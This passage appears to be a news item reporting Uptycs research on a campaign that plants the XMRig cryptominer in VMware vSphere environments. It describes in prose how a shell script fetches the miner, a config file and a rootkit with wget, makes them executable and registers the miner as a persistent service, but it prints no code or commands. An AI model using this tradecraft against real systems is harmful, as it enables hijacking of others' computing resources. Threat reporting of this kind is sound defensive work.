reports that researchers have discovered ongoing cyberattacks on enterprises running virtual networks through VMWare‘s vSphere container-based environment, which they have injected with the XMRig commercial cryptominer.
Threat actors have been observed modifying vSphere virtual networks using malicious shell scripts to allow them to run the cryptomining software undetected, said Siddharth Sharma of Uptycs.
“In this campaign as we saw the attackers tried to register the XMRig miner itself as a service (daemon), which runs whenever the system gets rebooted,” Sharma said.
“The shell script also contains commands which download the miner, the config file and the user mode rootkit from the attacker’s web server. The attackers used [the] wget utility to fetch the malicious components and chmod utility to make the components executable,” according to the report.
The script reloads the service once the cryptominer
has been dropped, allowing the miner to activate. The attacker’s wallet has received 8.942 XMR, valued at around $1,790, as of the report’s publication.